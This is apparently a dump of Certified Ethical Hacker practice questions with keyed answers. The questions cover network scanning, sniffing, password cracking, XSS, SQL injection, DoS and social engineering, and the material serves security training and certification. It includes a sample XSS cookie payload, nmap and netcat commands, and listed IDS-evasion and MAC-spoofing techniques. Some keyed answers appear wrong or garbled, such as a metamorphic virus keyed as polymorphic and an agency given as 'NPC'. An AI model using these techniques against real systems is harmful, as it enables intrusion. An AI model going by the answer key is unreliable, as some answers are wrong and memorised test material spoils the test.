One of your junior administrator is concerned with Windows LM hashes and password cracking. In your discussion with them, which of the following are true statements that you would point out? Select the best answers. a. John the Ripper can be used to crack a variety of passwords,but one limitation is that the output doesn't show if the password is upper or lower case. b. Enforcing Windows complex passwords is an effective countermeasure. c. BY using NTLMV1,you have implemented an effective countermeasure to password cracking. d. If a Windows LM password is 7 characters or less,the hash will be passed with the following characters,in HEX- 00112233445566778899. e. SYSKEY is an effective countermeasure.

a. John the Ripper can be used to crack a variety of passwords,but one limitation is that the output doesn't show if the password is upper or lower case. b. Enforcing Windows complex passwords is an effective countermeasure. e. SYSKEY is an effective countermeasure.

Trojan horse attacks pose one of the most serious threats to computer security. The image below shows different ways a Trojan can get into a system. Which are the easiest and most convincing ways to infect a computer? Picture: (Test 3 #53) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-245.gif a. Legitimate "shrink-wrapped" software packaged by a disgruntled employee b. NetBIOS (File Sharing) c. IRC (Internet Relay Chat) d. Downloading files,games and screensavers from Internet sites

a. Legitimate "shrink-wrapped" software packaged by a disgruntled employee

Which Windows system tool checks integrity of critical files that has been digitally signed by Microsoft? a. sigverif.exe b. msverif.exe c. signverif.exe d. verifier.exe

a. sigverif.exe

Several of your co-workers are having a discussion over the etc/passwd file. They are at odds over what types of encryption are used to secure Linux passwords.(Choose all that apply. ) a. Linux passwords can be encrypted with DES b. Linux passwords can be encrypted with MD5 c. Linux passwords are encrypted with asymmetric algrothims d. Linux passwords can be encrypted with Blowfish e. Linux passwords can be encrypted with SHA

a. Linux passwords can be encrypted with DES b. Linux passwords can be encrypted with MD5 d. Linux passwords can be encrypted with Blowfish

A hacker, who posed as a heating and air conditioning specialist, was able to install a sniffer program in a switched environment network. Which attack could the hacker use to sniff all of the packets in the network? a. MAC Flood b. Fraggle c. Tear Drop d. Smurf

a. MAC Flood

Samantha was hired to perform an internal security test of XYZ. She quickly realized that all networks are making use of switches instead of traditional hubs. This greatly limits her ability to gather information through network sniffing. Which of the following techniques can she use to gather information from the switched network or to disable some of the traffic isolation features of the switch? (Choose two) a. MAC Flooding b. ARP Spoofing c. Sniffing in promiscuous mode d. Ethernet Zapping

a. MAC Flooding b. ARP Spoofing

Peter is a Network Admin. He is concerned that his network is vulnerable to a smurf attack. What should Peter do to prevent a smurf attack? Select the best answer. a. Make sure his router won't take a directed broadcast b. Turn off fragmentation on his router c. Make sure all anti-virus protection is updated on all systems d. Disable multicast on the router e. He should disable unicast on all routers

a. Make sure his router won't take a directed broadcast

What is a Trojan Horse? a. Malicious code masquerading as or replacing legitimate code b. A malicious program that captures your username and password c. An unauthorized user who gains access to your user database and adds themselves as a user d. A server that is to be sacrificed to all hacking attempts in order to log and monitor the hacking activity

a. Malicious code masquerading as or replacing legitimate code

Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learnt to use these tools in his lab and is now ready for real world exploitation. He was able to effectively intercept communications between the two entities and establish credentials with both sides of the connections. The two remote ends of the communication never notice that Eric is relaying the information between the two. What would you call this attack? a. Man-in-the-middle b. ARP Proxy c. Poisoning Attack d. Interceptor

a. Man-in-the-middle

Which of the following is considered an acceptable option when managing a risk? a. Mitigate the risk. b. Reject the risk. c. Initiate the risk. d. Deny the risk.

a. Mitigate the risk.

You are writing security policy that hardens and prevents Footprinting attempt by Hackers. Which of the following countermeasures will NOT be effective against this attack? a. Monitor every employee computer with Spy cameras,keyloggers and spy on them b. Use an IDS that can be configured to refuse suspicious traffic and pick up Footprinting patterns c. Configure routers to restrict the responses to Footprinting requests d. Evaluate the information before publishing it on the Website/Intranet e. Perform Footprinting techniques and remove any sensitive information found on DMZ sites f. Lock the ports with suitable Firewall configuration g. Prevent search engines from caching a Webpage and use anonymous registration services h. Disable directory and use split-DNS i. Configure Web Servers to avoid information leakage and disable unwanted protocols

a. Monitor every employee computer with Spy cameras, keyloggers and spy on them

A company has five different subnets: 192.168.1.0, 192.168.2.0, 192.168.3.0, 192.168.4.0 and 192.168.5.0. How can NMAP be used to scan these adjacent Class C networks? a. NMAP -P 192.168.1-5. b. NMAP -P 192.168.1/17 c. NMAP -P 192.168.0.0/16 d. NMAP -P 192.168.1.0,2.0,3.0,4.0,5.0

a. NMAP -P 192.168.1-5.

Which NMAP command combination would let a tester scan every TCP port from a class C network that is blocking ICMP with fingerprinting and service detection? a. NMAP -P0 -A -O -p1-65535 192.168.0/24 b. NMAP -PN -O -sS -p 1-1024 192.168.0/8 c. NMAP -P0 -A -sT -p0-65535 192.168.0/16 d. NMAP -PN -A -O -sS 192.168.2.0/24

a. NMAP -P0 -A -O -p1-65535 192.168.0/24

Sandra is the security administrator of XYZ.com. One day she notices that the XYZ.com Oracle database server has been compromised and customer information along with financial data has been stolen. The financial loss will be estimated in millions of dollars if the database gets into the hands of competitors. Sandra wants to report this crime to the law enforcement agencies immediately. Which organization coordinates computer crime investigations throughout the United States? a. NPC b. NDCA c. CIA d. CIRP e. NICP

a. NPC

Which of the following Netcat commands would be used to perform a UDP scan of the lower 1024 ports? a. Netcat -u -v -w2 1-1024 b. Netcat -sS -O target/1024 c. Netcat -hU d. Netcat -h -U e. Netcat -sU -p 1-1024

a. Netcat -u -v -w2 1-1024

Which statement is TRUE regarding network firewalls preventing Web Application attacks? a. Network firewalls cannot prevent attacks because ports 80 and 443 must be opened. b. Network firewalls can prevent attacks if they are properly configured. c. Network firewalls can prevent attacks because they can detect malicious HTTP traffic. d. Network firewalls cannot prevent attacks because they are too complex to configure.

a. Network firewalls cannot prevent attacks because ports 80 and 443 must be opened.

How do you defend against ARP Spoofing? Select three. a. Place static ARP entries on servers,workstation and routers b. Use private VLANS c. Use ARPWALL system and block ARP spoofing attacks d. Tune IDS Sensors to look for large amount of ARP traffic on local subnets

a. Place static ARP entries on servers,workstation and routers b. Use private VLANS c. Use ARPWALL system and block ARP spoofing attacks

ViruXine.W32 virus hides their presence by changing the underlying executable code. This Virus code mutates while keeping the original algorithm intact, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all. Here is a section of the Virus code: Picture: (Test 2 #69) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-169a.gif What is this technique called? a. Polymorphic Virus b. Stealth Virus c. Metamorphic Virus d. Dravidic Virus

a. Polymorphic Virus

Finding tools to run dictionary and brute forcing attacks against FTP and Web servers is an easy task for hackers. They use tools such as arhontus or brutus to break into remote servers. Picture: (Test 2 #57) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-144.gif A command such as this, will attack a given 10.0.0.34 FTP and Telnet servers simultaneously with a list of passwords and a single login namE. linksys. Many FTP-specific password-guessing tools are also available from major security sites. What defensive measures will you take to protect your network from these attacks? Choose at least one answer (4 answers) a. Never leave a default password b. Use a word that has more than 21 characters from a dictionary as the password c. Never use a password related to your hobbies,pets,relatives,or date of birth. d. Never use a password related to the hostname,domain name,or anything else that can be found with whois e. Never use a password that can be found in a dictionary

a. Never leave a default password c. Never use a password related to your hobbies,pets,relatives,or date of birth. d. Never use a password related to the hostname,domain name,or anything else that can be found with whois e. Never use a password that can be found in a dictionary

Which of the following Nmap commands would be used to perform a stack fingerprinting? a. Nmap -O -p80 b. Nmap -u -o -w2 c. Nmap -sS -0p target d. Nmap -sT -p e. Nmap -hU -Q

a. Nmap -O -p80

Bret is a web application administrator and has just read that there are a number of surprisingly common web application vulnerabilities that can be exploited by unsophisticated attackers with easily available tools on the Internet. He has also read that when an organization deploys a web application, they invite the world to send HTTP requests. Attacks buried in these requests sail past firewalls, filters, platform hardening, SSL, and IDS without notice because they are inside legal HTTP requests. Bret is determined to weed out vulnerabilities. What are some of the common vulnerabilities in web applications that he should be concerned about? a. Non-validated parameters,broken access control,broken account and session management,cross-site scripting and buffer overflows are just a few common vulnerabilities b. No SSL configured,anonymous user account set as default,missing latest security patch,no firewall filters set and an inattentive system administrator are just a few common vulnerabilities c. Visible clear text passwords,anonymous user account set as default,missing latest security patch,no firewall filters set and no SSL configured are just a few common vulnerabilities d. No IDS configured,anonymous user account set as default,missing latest security patch,no firewall filters set and visible clear text passwords are just a few common vulnerabilities

a. Non-validated parameters,broken access control,broken account and session management,cross-site scripting and buffer overflows are just a few common vulnerabilities

Which Type of scan sends a packets with no flags set? Select the Answer a. Null Scan b. Half-Open Scan c. Xmas Scan d. Open Scan

a. Null Scan

When writing shellcodes, you must avoid ____________ because these will end the string. Picture: (Test 2 #40) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-128.gif a. Null bytes b. Root bytes c. Unicode bytes d. Char bytes

a. Null bytes

Here is the ASCII Sheet. Picture: (Test 3 #28) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-227a.gif http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-227b.gif You want to guess the DBO username juggyboy (8 characters) using Blind SQL Injection technique. What is the correct syntax? a. Option A b. Option C c. Option B d. Option D

a. Option A

What command would you type to OS fingerprint a server using the command line? Picture: (Test 3 #13) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-208.gif a. Option C b. Option A c. Option D d. Option B

a. Option C

XSS attacks occur on Web pages that do not perform appropriate bounds checking on data entered by users. Characters like < > that mark the beginning/end of a tag should be converted into HTML entities. Picture: (Test 1 #71) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-069a.gif http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-069b.gif What is the correct code when converted to html entities? a. Option D b. Option B c. Option C d. Option A

a. Option D

A penetration tester was hired to perform a penetration test for a bank. The tester began searching for IP ranges owned by the bank, performing lookups on the bank's DNS servers, reading news articles online about the bank, watching what times the bank employees come into work and leave from work, searching the bank's job postings (paying special attention to IT related jobs), and visiting the local dumpster for the bank's corporate office. What phase of the penetration test is the tester currently in? a. Passive information gathering b. Information reporting c. Vulnerability assessment d. Active information gathering

a. Passive information gathering

In which of the following should be performed first in any penetration test? a. Passive information gathering b. Intrusion Detection System testing c. System identification d. Firewall testing

a. Passive information gathering

What are common signs that a system has been compromised or hacked? (Choose three.) a. Patterns in time gaps in system and/or event logs b. New user accounts created c. Consistency in usage baselines d. Increased amount of failed logon events e. Server hard drives become fragmented f. Partitions are encrypted

a. Patterns in time gaps in system and/or event logs b. New user accounts created d. Increased amount of failed logon events

Which of the following can the administrator do to verify that a tape backup can be recovered in its entirety? a. Perform a full restore. b. Read the last 512 bytes of the tape. c. Read the first 512 bytes of the tape. d. Restore a random file.

a. Perform a full restore.

This attack uses social engineering techniques to trick users into accessing a fake Web site and divulging personal information. Attackers send a legitimate-looking e-mail asking users to update their information on the company's Web site, but the URLs in the e-mail actually point to a false Web site. a. Phishing attack b. Wiresharp attack c. Man-in-the-Middle attack d. Switch and bait attack

a. Phishing attack

Which of the following network attacks relies on sending an abnormally large packet size that exceeds TCP/IP specifications? a. Ping of death b. SYN flooding c. Smurf attack d. TCP hijacking

a. Ping of death

The following is part of a log file taken from the machine on the network with the IP address of 192.168.1.106: Time:Mar 13 17:30:15 Port:20 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:17 Port:21 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:19 Port:22 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:21 Port:23 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:22 Port:25 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:23 Port:80 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP Time:Mar 13 17:30:30 Port:443 Source:192.168.1.103 Destination:192.168.1.106 Protocol:TCP What type of activity has been logged? a. Port scan targeting 192.168.1.106 b. Denial of service attack targeting 192.168.1.103 c. Port scan targeting 192.168.1.103 d. Teardrop attack targeting 192.168.1.106

a. Port scan targeting 192.168.1.106

A person approaches a network administrator and wants advice on how to send encrypted email from home. The end user does not want to have to pay for any license fees or manage server services. Which of the following is the most secure encryption protocol that the network administrator should recommend? a. Pretty Good Privacy (PGP) b. Multipurpose Internet Mail Extensions (MIME) c. IP Security (IPSEC) d. Hyper Text Transfer Protocol with Secure Socket Layer (HTTPS)

a. Pretty Good Privacy (PGP)

Which are true statements concerning the BugBear and Pretty Park worms? Select the best answers. a. Pretty Park tries to connect to an IRC server to send your personal passwords. b. Pretty Park propagates via network shares and email c. Both programs use email to do their work. d. BugBear propagates via network shares and email e. Pretty Park can terminate anti-virus applications that might be running to bypass them.

a. Pretty Park tries to connect to an IRC server to send your personal passwords. c. Both programs use email to do their work. d. BugBear propagates via network shares and email

A Certificate Authority (CA) generates a key pair that will be used for encryption and decryption of email. The integrity of the encrypted email is dependent on the security of which of the following? a. Private key b. Public key c. Email server certificate d. Modulus length

a. Private key

Name two software tools used for OS guessing? (Choose two. a. Queso b. NetBus c. Snadboy d. Nmap e. UserInfo

a. Queso d. Nmap

There is some dispute between two network administrators at your company. Your boss asks you to come and meet with the administrators to set the record straight. Which of these are true about PKI and encryption? Select the best answers. a. RSA is a type of encryption. b. Public-key encryption was invented in 1976 by Whitfield Diffie and Martin Hellman. c. When it comes to eCommerce,as long as you have authenticity,and authenticity,you do not need encryption. d. PKI provides data with encryption,compression,and restorability.

a. RSA is a type of encryption. b. Public-key encryption was invented in 1976 by Whitfield Diffie and Martin Hellman.

The SYN flood attack sends TCP connections requests faster than a machine can process them. Attacker creates a random source address for each packet SYN flag set in each packet is a request to open a new connection to the server from the spoofed IP address Victim responds to spoofed IP address,then waits for confirmation that never arrives (timeout wait is about 3 minutes) Victim's connection table fills up waiting for replies and ignores new connections Legitimate users are ignored and will not be able to access the server How do you protect your network against SYN Flood attacks? a. RST cookies - The server sends a wrong SYN/ACK back to the client. The client should then generate a RST packet telling the server that something is wrong. At this point,the server knows the client is valid and will now accept incoming connections from that client normally b. SYN cookies. Instead of allocating a record,send a SYN-ACK with a carefully constructed sequence number generated as a hash of the clients IP address,port number,and other information. When the client responds with a normal ACK,that special sequence number will beincluded,which the server then verifies. Thus,the server first allocates memory on the third packet of the handshake,not the first. c. Check the incoming packet's IP address with the SPAM database on the Internet and enable the filter using ACLs at the Firewall d. Stack Tweaking. TCP stacks can be tweaked in order to reduce the effect of SYN floods. Reduce the timeout before a stack frees up the memory allocated for a connection e. Micro Blocks. Instead of allocating a complete connection,simply allocate a micro record of 16-bytes for the incoming SYN object

a. RST cookies - The server sends a wrong SYN/ACK back to the client. The client should then generate a RST packet telling the server that something is wrong. At this point,the server knows the client is valid and will now accept incoming connections from that client normally b. SYN cookies. Instead of allocating a record,send a SYN-ACK with a carefully constructed sequence number generated as a hash of the clients IP address,port number,and other information. When the client responds with a normal ACK,that special sequence number will beincluded,which the server then verifies. Thus,the server first allocates memory on the third packet of the handshake,not the first. e. Micro Blocks. Instead of allocating a complete connection,simply allocate a micro record of 16-bytes for the incoming SYN object

A security analyst is performing an audit on the network to determine if there are any deviations from the security policies in place. The analyst discovers that a user from the IT department had a dial-out modem installed. Which security policy must the security analyst check to see if dial-out modems are allowed? a. Remote-access policy b. Acceptable-use policy c. Firewall-management policy d. Permissive policy

a. Remote-access policy

Consider the following code: URL:http://www.certified.com/search.pl? text= <script>alert(document.cookie)</script> If an attacker can trick a victim user to click a link like this, and the Web application does not validate input, then the victim's browser will pop up an alert showing the users current set of cookies. An attacker can do much more damage, including stealing passwords, resetting your home page, or redirecting the user to another Web site. What is the countermeasure against XSS scripting? a. Replace "<" and ">" characters with "& l t;" and "& g t;" using server scripts b. Connect to the server using HTTPS protocol instead of HTTP c. Create an IP access list and restrict connections based on port number d. Disable Javascript in IE and Firefox browsers

a. Replace "<" and ">" characters with "& l t;" and "& g t;" using server scripts

The GET method should never be used when sensitive data such as credit card is being sent to a CGI program. This is because any GET command will appear in the URL, and will be logged by any servers. For example, let's say that you've entered your credit card information into a form that uses the GET method. The URL may appear like this: https://www.xsecurity-bank.com/creditcard.asp?cardnumber=453453433532234 The GET method appends the credit card number to the URL. This means that anyone with access to a server log will be able to obtain this information. How would you protect from this type of attack? a. Replace the GET with POST method when sending data b. Never include sensitive information in a script c. Use HTTPS SSLv3 to send the data instead of plain HTTPS d. Encrypt the data before you send using GET method

a. Replace the GET with POST method when sending data

As a securing consultant, what are some of the things you would recommend to a company to ensure DNS security? Select the best answers. a. Restrict Zone transfers b. Use split-horizon operation for DNS servers c. Have subnet diversity between DNS servers d. Use the same machines for DNS and other applications e. Harden DNS servers

a. Restrict Zone transfers b. Use split-horizon operation for DNS servers c. Have subnet diversity between DNS servers e. Harden DNS servers

Which of the following cryptography attack methods is usually performed without the use of a computer? a. Rubber hose attack b. Rainbow table attack c. Chosen key attack d. Ciphertext-only attack

a. Rubber hose attack

You want to know whether a packet filter is in front of 192.168.1.10. Pings to 192.168.1.10 don't get answered. A basic nmap scan of 192.168.1.10 seems to hang without returning any information. What should you do next? a. Run NULL TCP hping2 against 192.168.1.10 b. Run nmap XMAS scan against 192.168.1.10 c. The firewall is blocking all the scans to 192.168.1.10 d. Use NetScan Tools Pro to conduct the scan

a. Run NULL TCP hping2 against 192.168.1.10

The network administrator at Spears Technology, Inc has configured the default gateway Cisco router's access-list as below: Picture: (Test 2 #76) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-174.gif You are hired to conduct security testing on their network. You successfully brute-force the SNMP community string using a SNMP crack tool. The access-list configured at the router prevents you from establishing a successful connection. You want to retrieve the Cisco configuration from the router. How would you proceed? Choose at least one answer. (2 answers) a. Run a network sniffer and capture the returned traffic with the configuration file from the router b. Use the Cisco's TFTP default password to connect and download the configuration file c. Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router masking your IP address d. Send a customized SNMP set request with a spoofed source IP address in the range 192.168.1.0

a. Run a network sniffer and capture the returned traffic with the configuration file from the router d. Send a customized SNMP set request with a spoofed source IP address in the range 192.168.1.0

What is the best defense against privilege escalation vulnerability? a. Run services with least privileged accounts and implement multi-factor authentication and authorization. b. Run administrator and applications on least privileges and use a content registry for tracking. c. Patch systems regularly and upgrade interactive login privileges at the system administrator level. d. Review user roles and administrator privileges for maximum utilization of automation services.

a. Run services with least privileged accounts and implement multi-factor authentication and authorization.

Peter, a Network Administrator, has come to you looking for advice on a tool that would help him perform SNMP enquires over the network. Which of these tools would do the SNMP enumeration he is looking for? Select the best answers. a. SNMPUtil b. Solarwinds IP Network Browser c. NMap d. SNScan e. SNMPScan

a. SNMPUtil b. Solarwinds IP Network Browser d. SNScan

Your boss Tess King is attempting to modify the parameters of a Web-based application in order to alter the SQL statements that are parsed to retrieve data from the database. What would you call such an attack? a. SQL Injection attack b. SQL Select attack c. SQL Input attack d. SQL Piggybacking attack

a. SQL Injection attack

Which tool is used to automate SQL injections and exploit a database by forcing a given web application to connect to another database controlled by a hacker? a. SQLInjector b. NetCat c. Cain and Abel d. DataThief

a. SQLInjector

Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic. She is worried that adversaries might be monitoring the communication link and could inspect captured traffic. She would like to tunnel the information to the remote end but does not have VPN capabilities to do so. Which of the following tools can she use to protect the link? a. SSH b. PGP c. MD5 d. RSA

a. SSH

Which of the following tools are used for footprinting? (Choose four) a. Sam Spade b. Traceroute c. Cheops d. NSLookup e. Neotrace

a. Sam Spade b. Traceroute d. NSLookup e. Neotrace

Which of the following tools can be used to perform a zone transfer? a. Sam Spade b. Neotrace c. Finger d. Dig e. NSLookup f. Netcat g. Host

a. Sam Spade d. Dig e. NSLookup g. Host

A certified ethical hacker (CEH) is approached by a friend who believes her husband is cheating. She offers to pay to break into her husband's email account in order to find proof so she can take him to court. What is the ethical response? a. Say no; the friend is not the owner of the account. b. Say yes; the friend needs help to gather evidence. c. Say yes; do the job for free. d. Say no; make sure that the friend knows the risk she's asking the CEH to take.

a. Say no; the friend is not the owner of the account.

What is the main disadvantage of the scripting languages as opposed to compiled programming languages? a. Scripting languages are slower because they require an interpreter to run the code. b. Scripting languages are not object-oriented. c. Scripting languages are hard to learn. d. Scripting languages cannot be used to create graphical user interfaces.

a. Scripting languages are slower because they require an interpreter to run the code.

Joseph has just been hired on to a contractor company of the Department of Defense as their Senior Security Analyst. Joseph has been instructed on the company's strict security policies that have been implemented, and the policies that have yet to be put in place. Per the Department of Defense, all DoD users and the users of their contractors must use two-factor authentication to access their networks. Joseph has been delegated the task of researching and implementing the best two-factor authentication method for his company. Joseph's supervisor has told him that they would like to use some type of hardware device in tandem with a security or identifying pin number. Joseph's company has already researched using smart cards and all the resources needed to implement them, but found the smart cards to not be cost effective. What type of device should Joseph use for two-factor authentication? a. Security token b. OTP c. Biometric device d. Proximity cards

a. Security token

A Network Administrator was recently promoted to Chief Security Officer at a local university. One of employee's new responsibilities is to manage the implementation of an RFID card access system to a new server room on campus. The server room will house student enrollment information that is securely backed up to an off-site location. During a meeting with an outside consultant, the Chief Security Officer explains that he is concerned that the existing security controls have not been designed properly. Currently, the Network Administrator is responsible for approving and issuing RFID card access to the server room, as well as reviewing the electronic access logs on a weekly basis. Which of the following is an issue with the situation? a. Segregation of duties b. Lack of experience c. Inadequate disaster recovery plan d. Undue influence

a. Segregation of duties

Cyber Criminals have long employed the tactic of masking their true identity. In IP spoofing, an attacker gains unauthorized access to a computer or a network by making it appear that a malicious message has come from a trusted machine, by "spoofing" the IP address of that machine. How would you detect IP spoofing? a. Sending a packet to the claimed host will result in a reply. If the TTL in the reply is not the same as the packet being checked then it is a spoofed packet b. Check the IPID of the spoofed packet and compare it with TLC checksum. If the numbers match then it is spoofed packet c. Turn on 'Enable Spoofed IP Detection' in Wireshark,you will see a flag tick if the packet is spoofed d. Probe a SYN Scan on the claimed host and look for a response SYN/FIN packet,if the connection completes then it is a spoofed packet

a. Sending a packet to the claimed host will result in a reply. If the TTL in the reply is not the same as the packet being checked then it is a spoofed packet

Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and forward it so that the server might perform undesirable actions. Alternatively, the attacker could pose as the server or client after a legitimate authentication and gain unauthorized access to data. Which of the following is NOT a means that can be used to minimize or protect against such an attack? a. Sequence numbers monitoring b. SMB Signing c. Timestamps d. File permissions

a. Sequence numbers monitoring b. SMB Signing c. Timestamps

What type of session hijacking attack is shown in the exhibit? Picture: (Test 1 #23) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-030.gif a. Session Fixation Attack b. Cross-site scripting Attack c. Token sniffing Attack d. SQL Injection Attack

a. Session Fixation Attack

How would you describe an attack where an attacker attempts to deliver the payload over multiple packets over long periods of time with the purpose of defeating simple pattern matching in IDS systems without session reconstruction? A characteristic of this attack would be a continuous stream of small packets. a. Session Splicing b. Session Fragmentation c. Session Stealing d. Session Hijacking

a. Session Splicing

What type of cookies can be generated while visiting different web sites on the Internet? a. Session and permanent cookies. b. Permanent and long term cookies. c. Cookies are all the same,there is no such thing as different type of cookies. d. Session and external cookies.

a. Session and permanent cookies.

A hacker is attempting to use nslookup to query Domain Name Service (DNS). The hacker uses the nslookup interactive mode for the search. Which command should the hacker type into the command shell to request the appropriate records? a. Set type=ns b. Transfer type=ns c. Locate type=ns d. Request type=ns

a. Set type=ns

One of the effective DoS/DDoS countermeasures is 'Throttling'. Which statement correctly defines this term? a. Set up routers that access a server with logic to adjust incoming traffic to levels that will be safe for the server to process b. Load balance each server in a multiple-server architecture c. Replicating servers that can provide additional failsafe protection d. Providers can increase the bandwidth on critical connections to prevent them from going down in the event of an attack

a. Set up routers that access a server with logic to adjust incoming traffic to levels that will be safe for the server to process

Shayla is an IT security consultant, specializing in social engineering and external penetration tests. Shayla has been hired on by Treks Avionics, a subcontractor for the Department of Defense. Shayla has been given authority to perform any and all tests necessary to audit the company's network security. No employees for the company, other than the IT director, know about Shayla's work she will be doing. Shayla's first step is to obtain a list of employees through company website contact pages. Then she befriends a female employee of the company through an online chat website. After meeting with the female employee numerous times, Shayla is able to gain her trust and they become friends. One day, Shayla steals the employee's access badge and uses it to gain unauthorized access to the Treks Avionics offices. What type of insider threat would Shayla be considered? a. She would be considered an Insider Affiliate b. Shayla is an Insider Associate since she has befriended an actual employee c. Because she does not have any legal access herself,Shayla would be considered an Outside Affiliate d. Since Shayla obtained access with a legitimate company badge; she would be considered a Pure Insider

a. She would be considered an Insider Affiliate

A tester has been hired to do a web application security test. The tester notices that the site is dynamic and must make use of a back end database. In order for the tester to see if SQL injection is possible, what is the first character that the tester should use to attempt breaking a valid SQL request? a. Single quote b. Exclamation mark c. Semicolon d. Double quote

a. Single quote

While probing an organization you discover that they have a wireless network. From your attempts to connect to the WLAN you determine that they have deployed MAC filtering by using ACL on the access points. What would be the easiest way to circumvent and communicate on the WLAN? a. Sniff traffic if the WLAN and spoof your MAC address to one that you captured. b. Attempt to brute force the access point and update or delete the MAC ACL. c. Steel a client computer and use it to access the wireless network. d. Attempt to crack the WEP key using Airsnort.

a. Sniff traffic if the WLAN and spoof your MAC address to one that you captured.

Which of the following identifies the three modes in which Snort can be configured to run? a. Sniffer,Packet Logger,and Network Intrusion Detection System b. Sniffer,Host Intrusion Prevention System,and Network Intrusion Prevention System c. Sniffer,Network Intrusion Detection System,and Host Intrusion Detection System d. Sniffer,Packet Logger,and Host Intrusion Prevention System

a. Sniffer,Packet Logger,and Network Intrusion Detection System

Which of the following steganography utilities exploits the nature of white space and allows the user to conceal information in these white spaces? a. Snow b. Image Hide c. NiceText d. Gif-It-Up

a. Snow

Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her to verify her password with him ''just to double check our records.'' Jane does not suspect anything amiss, and parts with her password. Jack can now access Brown Co.'s computers with a valid user name and password, to steal the cookie recipe. What kind of attack is being illustrated here? a. Social Engineering b. Spoofing Identity c. Faking Identity d. Reverse Engineering e. Reverse Psychology

a. Social Engineering

Which of the following is NOT part of CEH Scanning Methodology? a. Social Engineering attacks b. Prepare Proxies c. Check for Open Ports d. Draw Network Diagrams e. Scan for Vulnerabilities f. Banner Grabbing g. Check for Live systems

a. Social Engineering attacks

Within the context of Computer Security, which of the following statements describes Social Engineering best? a. Social Engineering is the act of getting needed information from a person rather than breaking into a system b. Social Engineering is the means put in place by human resource to perform time accounting c. Social Engineering is the act of publicly disclosing information d. Social Engineering is a training program within sociology studies

a. Social Engineering is the act of getting needed information from a person rather than breaking into a system

When utilizing technical assessment methods to assess the security posture of a network, which of the following techniques would be most effective in determining whether end-user security training would be beneficial? a. Social engineering b. Network sniffing c. Vulnerability scanning d. Application security testing

a. Social engineering

A security consultant decides to use multiple layers of anti-virus defense, such as end user desktop anti-virus and E-mail gateway. This approach can be used to mitigate which kind of attack? a. Social engineering attack b. Forensic attack c. Scanning attack d. ARP spoofing attack

a. Social engineering attack

What does the term "Ethical Hacking" mean? a. Someone who is using his/her skills for defensive purposes. b. Someone who is using his/her skills for offensive purposes. c. Someone who is using his/her skills for ethical reasons. d. Someone who is hacking for ethical reasons.

a. Someone who is using his/her skills for defensive purposes.

What type of Virus is shown here? Picture: (Test 1 #28) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-025.gif a. Sparse Infector Virus b. Boot Sector Virus c. Macro Virus d. Metamorphic Virus e. Cavity Virus

a. Sparse Infector Virus

An attacker finds a web page for a target organization that supplies contact information for the company. Using available details to make the message seem authentic, the attacker drafts e-mail to an employee on the contact page that appears to come from an individual who might reasonably request confidential information, such as a network administrator. The email asks the employee to log into a bogus page that requests the employee's user name and password or click on a link that will download spyware or other malicious programming. Google's Gmail was hacked using this technique and attackers stole source code and sensitive data from Google servers. This is highly sophisticated attack using zero-day exploit vectors, social engineering and malware websites that focused on targeted individuals working for the company. What is this deadly attack called? a. Spear phishing attack b. Javelin attack c. Trojan server attack d. Social networking attack

a. Spear phishing attack

What techniques would you use to evade IDS during a Port Scan? (Select 4 answers) a. Spoof your IP address when launching attacks and sniff responses from the server b. Connect to proxy servers or compromised Trojaned machines to launch attacks c. Overload the IDS with Junk traffic to mask your scan d. Use fragmented IP packets e. Use source routing (if possible)

a. Spoof your IP address when launching attacks and sniff responses from the server b. Connect to proxy servers or compromised Trojaned machines to launch attacks d. Use fragmented IP packets e. Use source routing (if possible)

Sally is a network admin for a small company. She was asked to install wireless accesspoints in the building. In looking at the specifications for the access-points, she sees that all of them offer WEP. Which of these are true about WEP? Select the best answer. a. Stands for Wired Equivalent Privacy b. Stands for Wireless Encryption Protocol c. It offers end to end security d. It makes a WLAN as secure as a LAN

a. Stands for Wired Equivalent Privacy

During a penetration test, the tester conducts an ACK scan using NMAP against the external interface of the DMZ firewall. NMAP reports that port 80 is unfiltered. Based on this response, which type of packet inspection is the firewall conducting? a. Stateless b. Host c. Stateful d. Application

a. Stateless

What type of port scan is represented here? Picture: (Test 3 #43) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-254.gif a. Stealth Scan b. Full Scan c. XMAS Scan d. FIN Scan

a. Stealth Scan

A consultant has been hired by the V.P. of a large financial organization to assess the company's security posture. During the security testing, the consultant comes across child pornography on the V.P.'s computer. What is the consultant's obligation to the financial organization? a. Stop work immediately and contact the authorities. b. Delete the pornography,say nothing,and continue security testing. c. Say nothing and continue with the security testing. d. Bring the discovery to the financial organization's human resource department.

a. Stop work immediately and contact the authorities.

Virus Scrubbers and other malware detection program can only detect items that they are aware of. Which of the following tools would allow you to detect unauthorized changes or modifications of binary files on your system by unknown malware? a. System integrity verification tools b. A properly configured gateway c. There is no way of finding out until a new updated signature file is released d. Anti-Virus Software

a. System integrity verification tools

Which tool/utility can help you extract the application layer data from each TCP connection from a log file into separate files? a. TCPflow b. Tcpdump c. Snort d. argus

a. TCPflow

